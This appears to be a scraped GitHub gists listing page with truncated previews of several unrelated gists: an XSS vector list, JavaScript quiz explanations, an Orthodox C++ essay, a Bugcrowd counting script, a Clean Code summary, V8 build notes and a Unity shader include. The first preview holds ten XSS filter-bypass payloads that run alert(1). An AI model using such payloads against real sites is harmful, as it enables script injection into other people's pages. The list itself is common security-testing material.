Raigorx Hellscream raigorx
@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@MattSurabian
MattSurabian / JS Quiz Answer Explanations.md
Last active October 11, 2023 19:38
My attempt to explain the answers for David Shariff's feelings hurting JS quiz found at: davidshariff.com/js-quiz/

Are your feelings hurt?

If you rushed through David Shariff's JS Quiz or are just new to JS they might be. I know mine were. After I dried my eyes, I took the quiz again, this time very slowly trying to get at the meat behind each answer. Below is my attempt to explain each question's answer and offer some interesting permutations so that others can move beyond their hurt feelings and come out the other side better JS developers.

I initially thought I'd turn this into a blog post but think it's probably better as a gist.

Question #1

Don't overthink it.

var foo = function foo() {
@bkaradzic
bkaradzic / orthodoxc++.md
Last active November 15, 2024 12:57
Orthodox C++

Orthodox C++

What is Orthodox C++?

Orthodox C++ (sometimes referred to as C+) is a minimal subset of C++ that improves C, but avoids all unnecessary things from so-called Modern C++. It's the exact opposite of what Modern C++ is supposed to be.

Why not Modern C++?

@bl4de
bl4de / get_programs.sh
Last active July 12, 2017 06:57
How many bug bounty programs listed on Bugcrowd
#!/bin/bash
#
# -- @_bl4de https://twitter/_bl4de
#
# -- This script checks how many programs are listed on
# -- https://bugcrowd.com/list-of-bug-bounty-programs
#
echo "[+] get list of bugbounty programs from Bugcrowd..."
curl --silent -o tmp.list https://bugcrowd.com/list-of-bug-bounty-programs
@wojteklu
wojteklu / clean_code.md
Last active November 15, 2024 07:19
Summary of 'Clean code' by Robert C. Martin

Code is clean if it can be understood easily – by everyone on the team. Clean code can be read and enhanced by a developer other than its original author. With understandability comes readability, changeability, extensibility and maintainability.


General rules

  1. Follow standard conventions.
  2. Keep it simple stupid. Simpler is always better. Reduce complexity as much as possible.
  3. Boy scout rule. Leave the campground cleaner than you found it.
  4. Always find root cause. Always look for the root cause of a problem.

Design rules

Building Chrome V8 on Windows

In order to be able to build v8 from scratch on Windows for x64, please follow the following steps.

These instructions were updated to work with Windows 11 Build 10.0.22621, but this should also work on Windows 10.

NOTE: While the Chrome team does provide decent documentation, there are some nuances and other additional steps that must be done for v8 to compile on Windows.

Documentation:

@FreyaHolmer
FreyaHolmer / GpuPrinter.cginc
Last active November 1, 2024 23:31
A unity shader .cginc to draw numbers in the fragment shader - see the first comment below for example usage!
///////////////////////////////////////////////////////////////////////////////
// ABOUT: A unity Shader .cginc to draw numbers in the fragment shader
// AUTHOR: Freya Holmér
// LICENSE: Use for whatever, commercial or otherwise!
// Don't hold me liable for issues though
// But pls credit me if it works super well <3
// LIMITATIONS: There's some precision loss beyond 3 decimal places
// CONTRIBUTORS: yes please! if you know a more precise way to get
// decimal digits then pls lemme know!
// GetDecimalSymbolAt() could use some more love/precision